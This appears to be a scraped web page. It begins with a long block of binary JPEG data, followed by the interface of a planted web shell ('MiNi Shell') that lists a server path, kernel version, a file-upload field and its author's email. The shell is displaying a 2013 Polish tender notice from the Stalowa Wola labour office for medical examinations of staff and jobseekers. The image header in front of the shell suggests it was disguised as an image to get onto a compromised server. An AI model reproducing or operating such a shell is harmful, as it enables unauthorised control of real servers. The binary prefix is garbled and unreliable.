JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131212/515982-N-2013.html

<p class="kh_header"><b>Stalowa Wola: Przedmiotem zamówienia jest przeprowadzanie badań lekarskich dla pracowników Powiatowego Urzedu Pracy w Stalowej Woli oraz osób bezrobotnych i poszukujacych pracy kierowanych przez Powiatowy Urząd Pracy w Stalowej Woli</b><br>
<b>Numer ogłoszenia: 515982 - 2013; data zamieszczenia: 12.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Stalowej Woli , ul. Dmowskiego 8, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 6433780, faks 015 6433787.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupstalowawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest przeprowadzanie badań lekarskich dla pracowników Powiatowego Urzedu Pracy w Stalowej Woli oraz osób bezrobotnych i poszukujacych pracy kierowanych przez Powiatowy Urząd Pracy w Stalowej Woli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest przeprowadzanie badań lekarskich (ogólnych 
i specjalistycznych) dla pracowników Powiatowego Urzędu Pracy w Stalowej Woli oraz osób bezrobotnych i poszukujących pracy kierowanych przez Powiatowy Urząd Pracy w Stalowej Woli, mających na celu stwierdzenie: 1)ogólnej zdolności do wykonywania pracy, 2)ustalenia zdolności do wykonywania pracy, uczestnictwa w szkoleniu lub przygotowaniu zawodowym dorosłych, odbywania stażu, wykonywania prac społecznie użytecznych w zawodzie lub na stanowisku określonym w skierowaniu w zakresie określonym w przepisach prawnych dot. badań lekarskich pracowników,  3)wydania dokumentu potwierdzającego tę zdolność albo brak tej zdolności. 2.Świadczeniem usług o których mowa w pkt 1 objęci będą: 1)pracownicy Powiatowego Urzędu Pracy w Stalowej Woli,
2)osoby zarejestrowane w Powiatowym Urzędzie Pracy w Stalowej Woli jako bezrobotne lub poszukujące pracy, które mają prawo korzystać z usług 
i instrumentów rynku pracy na zasadach określonych w ustawie z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy  (tekst jednolity Dz.U. 
z 2013 r., poz.674, z późn. zm.) 3.Badania lekarskie, o których mowa w pkt 1, przeprowadzane będą na podstawie skierowania, które Zamawiający wyda indywidualnie dla każdego pracownika/ bezrobotnego/poszukującego pracy. 4.Badania powinny być wykonywane w placówkach zlokalizowanych na terenie Stalowej Woli we wszystkie dni robocze tygodnia tj. od poniedziałku do piątku,      w godzinach od 7:00 do 15:00. 5.Badania, których wykonanie nie jest możliwe na terenie Stalowej Woli mogą być przeprowadzone w najbliższej możliwej miejscowości.  6.Wynikiem końcowym badania lekarskiego będzie wydanie zaświadczenia lub orzeczenia lekarskiego - na obowiązującym druku - potwierdzającego zdolność albo  brak tej zdolności do wykonywania pracy lub odbywania szkolenia, stażu, przygotowania zawodowego dorosłych, wykonywania prac społecznie użytecznych w określonym w skierowaniu zawodzie. 7.Badania lekarskie powinny być wykonywane na bieżąco, w zależności od potrzeb Zamawiającego, niezwłocznie po zgłoszeniu się na badania  osoby posiadającej skierowanie wystawione przez Zamawiającego. 8.Zakres badań stanowiących przedmiot zamówienia Przewidywana liczba osób, które Zamawiający zamierza skierować na badania wynosi  550 osób, w tym na: a)badanie przez lekarza uprawnionego do badań profilaktycznych wraz z wydaniem zaświadczenia o braku/istnieniu przeciwwskazań do pracy na określonym stanowisku (lekarz Medycyny Pracy) - 550 osób, b)podstawowe badania laboratoryjne : - morfologia- 500 osób, - OB - 500 osób, - mocz badanie ogólne - 480 osób, - RTG klatki piersiowej - 290 osób, - badanie słuchu - audiogram - 20 osób, - poziom cukru w krwi - 170 osób, - bilirubina całkowita - 10 osób, - EKG z opisem -20 osób, - Aminotransferaza GOT- 10 osób, - Aminotransferaza PGT- 10 osób,- HBs-Ag - 10 osób, - ANTY HCV - 10 osób, c)badanie specjalistyczne wg potrzeb określonych przez lekarza: - okulista- 220 osób, - laryngolog- 90 osób,- neurolog - 130 osób,
-pulmonolog - 5 osób d)badania w przypadku kierowców różnych kategorii (prawo jazdy kat. C, D, C+E, D+E), oraz  wydanie orzeczenia lekarskiego - na obowiązującym druku (zgodnie z przepisami o ruchu drogowym) - potwierdzającego zdolność albo  brak tej zdolności do wykonywania pracy lub odbywania szkolenia  w zawodzie kierowcy - 30 osób, e)badanie profilaktyczne w zakresie kwalifikacji kierowców różnych kategorii prawa jazdy wraz z wydaniem stosownego zaświadczenia - 25 osób, 9.Podany przez Zamawiającego zakres badań oraz  liczba osób, którą Zamawiający zamierza skierować na badania  wyszczególnione w Załączniku Nr 1 do SIWZ - Formularz ofertowy mają charakter szacunkowy i stanowią element służący wyborowi najkorzystniejszej oferty. Rzeczywisty zakres badań i limity na poszczególne badania   będą wynikać z aktualnych potrzeb Zamawiającego. 10.W przypadku, gdy na badania zostanie skierowana mniejsza niż określona w Załączniku Nr 1  do SIWZ - Formularz ofertowy liczba osób, Zamawiający zapłaci tylko za faktycznie wykonane badania. 11.W przypadku, gdy na badania zostanie skierowana większa niż określona 
w Załączniku Nr 1  do SIWZ - Formularz ofertowy liczba osób, Zamawiający zapłaci za wykonane badania wg cen jednostkowych podanych przez Wykonawcę 
w złożonej ofercie.   12.Wykonawcy nie przysługuje roszczenie o wykonanie badań  z tytułu niezrealizowania szacunkowej ilości badań wskazanych w przedmiocie zamówienia. 13.Wykonawca bierze na siebie ciężar zorganizowania wszystkich ww. badań oraz innych badań niezbędnych do ustalenia zdolności do wykonywania pracy, uczestnictwa  w szkoleniu lub przygotowaniu zawodowym dorosłych, odbywania stażu, wykonywania prac społecznie użytecznych w zawodzie lub na stanowisku określonym w skierowaniu w zakresie określonym w przepisach prawnych dot. badań lekarskich pracowników, których nie jest w stanie realizować samodzielnie. 14.Okresem rozliczeniowym będzie okres pełnego miesiąca kalendarzowego. Wykonawca będzie wystawiał faktury w terminie 7 dni od zakończenia okresu rozliczeniowego. Faktury będą wystawiane na podstawie dostarczanych przez Zamawiającego imiennych wykazów skierowanych osób. Zamawiający będzie dostarczał wykazy pierwszego dnia roboczego następnego miesiąca. 15.W przypadku wykonania  przez Zamawiającego badań nieujętych w Załączniku  Nr 1  do SIWZ Formularz ofertowy- podstawą rozliczeń będą ceny z aktualnego cennika usług Wykonawcy. 16.Zapłata za wykonane usługi będzie dokonywana przez Zamawiającego z dołu za każdy okres rozliczeniowy na konto bankowe Wykonawcy w terminie ustalonym w zawartej umowie.  17.Za dzień zapłaty uważany będzie dzień uznania  rachunku bankowego Wykonawcy.
18.Cena podana przez Wykonawcę w załączniku Nr 1 do SIWZ - Formularz ofertowy nie będzie podlegała zmianom przez okres realizacji zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych do 20% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-1, 85.12.10.00-3, 85.12.12.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedstawi zaświadczenie potwierdzające wpis do rejestru Zakładów Opieki Zdrowotnej 
w Wojewódzkim Ośrodku Medycyny Pracy zgodnie z wymogami ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy (t.j. -  Dz. U. z 2004 r., Nr 125, poz. 1317 z późn. zm.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pupstalowawola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Stalowej Woli, ul. R. Dmowskiego 8, 37-450 Stalowa Wola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Stalowej Woli, ul. R. Dmowskiego 8, 37-450 Stalowa Wola, pokój nr 36 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część zamówienia może być współfinansowana ze środków Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com